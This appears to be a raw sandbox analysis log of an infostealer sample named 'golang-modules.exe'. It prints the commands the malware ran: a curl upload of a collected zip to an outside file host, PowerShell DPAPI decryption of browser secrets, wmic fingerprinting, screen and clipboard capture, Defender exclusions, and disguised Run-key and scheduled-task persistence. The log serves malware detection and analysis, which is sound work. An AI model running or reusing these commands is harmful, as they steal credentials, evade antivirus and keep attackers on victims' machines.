Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassEscape
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtom
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedPatternCharacter
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-IdentityEscape
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-InvalidBracedQuantifier
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-LegacyOctalEscapeSequence
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Term
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-term
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
Source: golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownHTTPS traffic detected: 49.13.193.134:443 -> 192.168.11.20:49781 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
Source: cmd.exeProcess created: 96

System Summary

barindex
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_gn1rs4wh.ai1.ps1
Source: golang-modules.exe, 00000000.00000000.108989240211.00007FF6281E7000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenode.exe* vs golang-modules.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
Source: classification engineClassification label: mal100.spyw.expl.evad.winEXE@767/113@3/3
Source: C:\Users\user\Desktop\golang-modules.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.dbJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3388:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3388:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7200:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8536:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8536:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8924:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7200:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8924:120:WilError_03
Source: C:\Users\user\Desktop\golang-modules.exeFile created: C:\Users\user\AppData\Local\Temp\pkgJump to behavior
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
Source: golang-modules.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessorId FROM WIN32_PROCESSOR
Source: C:\Windows\System32\cscript.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\golang-modules.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: golang-modules.exe, 00000000.00000003.109031913862.000001F1DBAD1000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109033602852.000001F1DBAD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: golang-modules.exe, 00000000.00000003.109031913862.000001F1DBAD1000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109033602852.000001F1DBAD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: golang-modules.exe, 00000000.00000003.109031913862.000001F1DBAD1000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109033602852.000001F1DBAD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: golang-modules.exe, 00000000.00000003.109031913862.000001F1DBAD1000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109033602852.000001F1DBAD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: golang-modules.exe, 00000000.00000003.109031913862.000001F1DBAD1000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109033602852.000001F1DBAD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: golang-modules.exe, 00000000.00000003.109031913862.000001F1DBAD1000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109033602852.000001F1DBAD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: golang-modules.exe, 00000000.00000003.109031913862.000001F1DBAD1000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109033602852.000001F1DBAD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: golang-modules.exe, 00000000.00000003.109031913862.000001F1DBAD1000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109033602852.000001F1DBAD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: golang-modules.exeVirustotal: Detection: 6%
Source: C:\Users\user\Desktop\golang-modules.exeFile read: C:\Users\user\Desktop\golang-modules.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\golang-modules.exe "C:\Users\user\Desktop\golang-modules.exe"
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oauixwyt\oauixwyt.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES57FC.tmp" "c:\Users\user\AppData\Local\Temp\oauixwyt\CSC1DE16476F16E4E708A1B2D331C6787A.TMP"
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,136,189,34,74,147,133,60,232,14,60,255,73,188,213,48,222,168,142,253,158,248,133,177,139,88,77,61,151,164,102,155,199,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,0,199,30,189,167,167,11,187,110,144,216,122,248,70,97,140,73,214,114,118,171,5,17,181,195,185,79,195,66,51,65,48,0,0,0,136,212,114,34,12,100,149,93,133,55,135,123,14,54,78,227,90,179,39,207,67,251,86,83,147,108,45,88,219,161,237,51,30,59,93,206,64,185,123,13,105,154,32,135,149,44,94,219,64,0,0,0,199,49,210,98,232,67,7,168,248,100,118,31,55,2,255,180,150,58,185,169,41,93,199,129,193,83,93,21,116,52,166,144,1,169,141,205,12,19,247,89,22,244,86,254,137,103,207,81,105,218,121,206,85,43,186,110,147,124,58,17,202,177,238,15), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,136,189,34,74,147,133,60,232,14,60,255,73,188,213,48,222,168,142,253,158,248,133,177,139,88,77,61,151,164,102,155,199,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,0,199,30,189,167,167,11,187,110,144,216,122,248,70,97,140,73,214,114,118,171,5,17,181,195,185,79,195,66,51,65,48,0,0,0,136,212,114,34,12,100,149,93,133,55,135,123,14,54,78,227,90,179,39,207,67,251,86,83,147,108,45,88,219,161,237,51,30,59,93,206,64,185,123,13,105,154,32,135,149,44,94,219,64,0,0,0,199,49,210,98,232,67,7,168,248,100,118,31,55,2,255,180,150,58,185,169,41,93,199,129,193,83,93,21,116,52,166,144,1,169,141,205,12,19,247,89,22,244,86,254,137,103,207,81,105,218,121,206,85,43,186,110,147,124,58,17,202,177,238,15), $null, 'CurrentUser')
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get serialnumber
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wy53vvk1\wy53vvk1.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES82F4.tmp" "c:\Users\user\AppData\Local\Temp\wy53vvk1\CSC3C5D7F16B844BD8853D45FBCDF88AC3.TMP"
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic baseboard get serialnumber
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:list
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "Speed"
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cscript.exe C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows"
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_computersystemproduct get uuid
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic PATH Win32_VideoController GET Description,PNPDeviceID
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CaptureScreens.ps1""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CaptureScreens.ps1"
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-887849.zip";"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-887849.zip";
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\user\Desktop\golang-modules.exe" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -o "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic memorychip get serialnumber
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\user\Desktop\golang-modules.exe" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -o "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:list
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "Speed"
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get processorid
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
